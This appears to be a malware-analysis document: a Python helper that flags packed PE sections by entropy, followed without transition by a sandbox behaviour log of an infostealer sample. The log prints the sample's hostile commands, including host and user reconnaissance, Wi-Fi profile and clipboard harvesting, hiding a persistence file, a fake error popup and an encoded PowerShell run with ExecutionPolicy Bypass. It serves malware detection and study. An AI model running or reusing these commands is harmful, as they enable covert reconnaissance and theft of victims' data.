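    """Bits of entropy per byte, 0.0 for a constant buffer up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def pe_sections(pe: bytes):
    """Yield (section name, raw section bytes) from a PE image.
    Only the DOS stub pointer, the COFF header and the section table are parsed."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield name.rstrip(b"\0").decode("ascii", "replace"), pe[raw_ptr:raw_ptr + raw_size]


def section_complexities(pe: bytes) -> dict:
    return {name: zlib_complexity(raw) for name, raw in pe_sections(pe)}


def packed_sections(pe: bytes, threshold: float = 0.99) -> list:
    """Names of sections whose bytes are effectively incompressible."""
    return [name for name, c in section_complexities(pe).items() if c >= threshold]


def build_fake_pe(sections) -> bytes:
    """Constructed fixture: a structurally minimal PE32+ carrying the given
    (name, bytes) sections. It is not loadable; it only exercises the parser above."""
    opt_size = 240  # PE32+ optional header size, zero-filled because only the section table matters
    header_end = 64 + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)          # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, opt_size, 0x22)
    table, body, ptr = b"", b"", header_end
    for i, (name, raw) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), 0x1000 * (i + 1),
                             len(raw), ptr, 0, 0, 0, 0, 0x60000020)
        body += raw
        ptr += len(raw)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + body


# Constructed demo image: one incompressible section named like UPX's payload
# section, one section of NOP sleds that zlib collapses almost entirely.
RANDOM_BLOB = os.urandom(8192)
DEMO_PE = build_fake_pe([("UPX1", RANDOM_BLOB), (".text", b"\x90" * 8192)])

if __name__ == "__main__":
    for name, raw in pe_sections(DEMO_PE):
        print(f"{name:8s} zlib={zlib_complexity(raw):.4f} entropy={shannon_entropy(raw):.2f}")
    print("packed:", packed_sections(DEMO_PE))
```

Point `pe_sections` at the bytes of a real dropped file from the `_MEI` directory to reproduce the report's numbers; the ratio and the entropy should be read together, since a section of genuinely random-looking data with a name other than UPX0/UPX1 usually indicates a custom packer or an encrypted payload rather than UPX.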
            Source: system_info.txt.1.drBinary string: Boot Device: \Device\HarddiskVolume1
            Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@130/182@4/6
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E29E0 GetLastError,FormatMessageW,MessageBoxW
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2084:120:WilError_03
            Source: C:\Users\user\Desktop\rename_me_before.exeMutant created: \Sessions\1\BaseNamedObjects\E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2004:120:WilError_03
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962Jump to behavior
            Source: rename_me_before.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\rename_me_before.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\cmd.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: rename_me_before.exeVirustotal: Detection: 67%
            Source: rename_me_before.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\rename_me_before.exeFile read: C:\Users\user\Desktop\rename_me_before.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: vcruntime140.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: libffi-8.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: sqlite3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: libcrypto-3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: libssl-3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Section loaded: msasn1.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
